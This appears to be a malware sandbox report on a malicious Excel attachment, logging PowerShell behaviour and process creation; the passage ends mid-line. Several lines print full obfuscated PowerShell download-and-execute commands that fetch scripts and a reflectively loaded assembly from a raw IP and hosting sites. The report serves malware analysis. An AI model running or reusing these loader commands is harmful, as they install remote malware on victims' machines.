        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: NB PO-104105107108.xlsStream path 'MBD0004282B/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
        Source: NB PO-104105107108.xlsStream path 'Workbook' entropy: 7.9984340377 (max. 8.0)
        Source: ~DFC80289B61A888CC7.TMP.0.drStream path 'MBD0004282B/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
        Source: ~DFC80289B61A888CC7.TMP.0.drStream path 'Workbook' entropy: 7.9984340377 (max. 8.0)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7322Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2621Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1494Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8377Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1381
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2010
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1558
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5611
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.dllJump to dropped file
        Source: C:\Windows\System32\mshta.exe TID: 3600Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3816Thread sleep count: 7322 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3816Thread sleep count: 2621 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3880Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3884Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1500Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2136Thread sleep time: -13835058055282155s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2136Thread sleep time: -1800000s >= -30000sJump to behavior
        Source: C:\Windows\System32\mshta.exe TID: 2084Thread sleep time: -360000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2956Thread sleep count: 1381 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2956Thread sleep count: 2010 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448Thread sleep time: -180000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1504Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2132Thread sleep count: 1558 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2132Thread sleep count: 5611 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3344Thread sleep time: -10145709240540247s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3332Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3344Thread sleep time: -2400000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3344Thread sleep time: -600000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2648, type: MEMORYSTR
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE734.tmp" "c:\Users\user\AppData\Local\Temp\1dk2y04d\CSCA659ECAEC3554F2F90108FC5834CA54.TMP"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeingJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUC